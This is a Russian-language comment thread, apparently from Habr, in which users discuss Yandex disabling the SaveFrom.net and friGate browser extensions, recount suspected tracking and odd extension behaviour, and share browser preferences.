То же помню звук видеостраницы закрытой, в первые момент ничего не понял, звучала именно реклама, и вырубил яндекс в диспетчере. Желания пользоваться этим поделием сразу пропало. У некоторых браузерах SaveFrom.net работает более или менее нормально, а как ещё видео с ютуба качать? Попробовал всякий софт, ни один работал. А в файрфоксе SaveFrom.net работает!
ЗЫ
Да, для меня хороший браузер, который может нормально сохранить, а за тем открыть любую страницу. Хронька во обще этого делать не умела. А у ЯБ не помню чтобы что-то сохранял, изначально было пренебрежительное отношения этому софту, хотя немного я им попользовался.
Извините, Яндексы, мне борьба с трижды проклятой украинской цензурой ныне даже важнее безопасности.
А можно поинтересоваться почему автор статьи пишет "зашифровано на ключе" вместо "зашифровано с использованием ключа", или хотя бы "зашифровано ключом"?
Что за "на ключе"?...
Я так понял, в friGate весь profiler.js ни для чего полезного не используется? Поставил в начале initProfiler() return. Вроде бы всё работает. Но в других файлах там столько всего обфусцированного и, кстати, с вызовами Яндекс Советника, что уверенности нет.
Ещё припоминаю, что friGate давным-давно слал запросы с информацией о посещаемых страницах на сервера s1814.thetrafficstat.net и s814.thetrafficstat.net. Причём не помогало даже его отключение по клику на иконке (если через настройки расширений выключить, то, конечно, отключался). Описывал это на их форуме, те ответили что-то невразумительное.
Да, эта зараза НЕ всегда вылезает, а когда вылезает диву даешься, что она отключена. Баги, вирусы, колдунство?? Особенно характерно в местах, где он уже стоял, но был отключен.
P.S. Ну и традиционный юмор наших дней "Если у вас паранойя, это еще не значит, что за вами никто не следит". Не следит Сэйф фром нет, так 5 копеек вставит Я-Б иди Г-Х. Или совместное предприятие «Рог и копытО», например, по данной схеме habr.com/ru/post/410159 (не обязательно быть злобным хацкером, можно быть транснациональной компанией в отрасли информационных технологий, зарегистрированной в Нидерландах).
Спасибо! Это очень интересно!
У меня выскочило, что нужно обновить расширение электронной подписи - не знаю что и делать, обновлять или нет.
Ещё с некоторой регулярностью сбрасываются куки, по крайней мере вконтакте, но было что и всех приложений. Чуть ли не каждый день на ПК в браузере просит заново войти в Whatsapp, хотя на телефоне показывает, что старая сессия не закрыта.
Недавно с чего-то активировались все расширения, одно даже два раза висело на панели, пока не удалил его.
Яндекс отключил расширения с аудиторией в 8 млн пользователей. Объясняем, почему мы пошли на такой шаг